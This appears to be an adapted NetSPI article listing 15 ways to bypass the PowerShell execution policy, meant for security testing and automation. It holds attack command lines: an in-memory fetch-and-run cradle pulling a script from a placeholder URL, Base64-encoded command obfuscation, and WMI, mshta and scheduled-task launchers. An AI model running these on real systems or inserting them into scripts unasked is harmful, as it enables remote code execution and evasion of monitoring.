
Bypass the PowerShell Execution Policy

💻 15 Ways to Bypass the PowerShell Execution Policy

Author: Scott Sutherland (summarized & adapted)
Original: NetSPI Blog


🧠 Introduction

PowerShell's execution policy is designed to prevent unauthorized or accidental script execution. Microsoft itself documents it as a safety feature rather than a security boundary, which is why the workarounds below exist. There are many legitimate reasons to work around it, especially during penetration testing, red team exercises, or automation. Below are 15 common methods to bypass the policy, with explanations.


🔐 Bypass Techniques Explained

  1. Paste Script Directly in Console
    PowerShell applies the execution policy only to script files. Code pasted directly into the console is not subject to it at all.
  2. Pipe Script to PowerShell
    Echo the script and pipe it to PowerShell's standard input (the trailing `-` tells PowerShell to read the script from stdin):
    `echo Write-Host "Hello" | powershell -noprofile -`
    This avoids saving the script to disk.
  3. Read Script File and Pipe to PowerShell
    This reads a script from disk and pipes its contents in:
    `Get-Content script.ps1 | powershell -noprofile -`
    The execution policy is not enforced when the script arrives as standard input rather than as a file.
  4. Download and Execute in Memory
    Common in red teaming, this downloads a script and executes it directly:
    `powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://example.com/script.ps1')"`
    Nothing is written to disk.
  5. Use the -Command Argument
    Code passed via the `-command` flag is evaluated like pasted input:
    `powershell -command "Write-Host 'Bypassed!'"`
  6. Use -EncodedCommand
    A script can be Base64-encoded (from its UTF-16LE bytes) and passed to PowerShell:
    
    $command = "Write-Host 'Hello'"
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
    $encoded = [Convert]::ToBase64String($bytes)
    powershell -EncodedCommand $encoded
        
    Useful for obfuscation and policy bypass. Note that the encoding is trivially reversible; it hides the script from a casual glance, not from anyone who decodes it.
  7. Set Policy via Group Policy or Registry
    If you have the rights, change the execution policy for the current process (no administrator privileges needed):
    `Set-ExecutionPolicy Bypass -Scope Process`
    Or modify registry keys like `HKLM:\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell`. A policy set through Group Policy (the MachinePolicy and UserPolicy scopes) takes precedence over both of these.
  8. Use ISE (Integrated Scripting Environment)
    ISE sometimes behaves differently and may allow execution:
    `powershell_ise.exe script.ps1`
  9. Change File Extension
    Rename `.ps1` to `.txt` and read it into memory inside another script. This avoids detection and enforcement that key on the `.ps1` extension.
  10. Use WMI to Launch Script
    PowerShell can be launched via WMI methods that bypass the policy:
    `Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "powershell -nop -enc ..."`
  11. Use Task Scheduler
    Create a scheduled task that runs your PowerShell script. The execution policy isn't enforced in the same way:
    `schtasks /create /tn bypass /tr "powershell.exe -File script.ps1" /sc once /st 00:00`
  12. Use WinRM or PS Remoting
    When executing scripts remotely, the policy on the target system may not apply, especially if the code is sent as a command rather than a script file:
    `Invoke-Command -ScriptBlock {Write-Host "Hello"} -ComputerName target`
  13. Use DLL Injection or Reflective PE
    Advanced method: load the PowerShell runtime into memory via a custom DLL or PE loader. Used by tools like PowerShell Empire.
  14. Use Alternate Shells (e.g., MSHTA, wscript)
    Launch PowerShell indirectly from other interpreters:
    `mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -nop -enc ..."":close")`
  15. Exploit Software That Invokes PowerShell
    Some tools like MSBuild, Excel macros, or installer frameworks may invoke PowerShell, and that invocation can be hijacked.

These methods are intended for authorized security assessments, research, and automation. Use responsibly and within the bounds of local laws and organizational policy.

Last adapted from NetSPI: https://www.netspi.com/...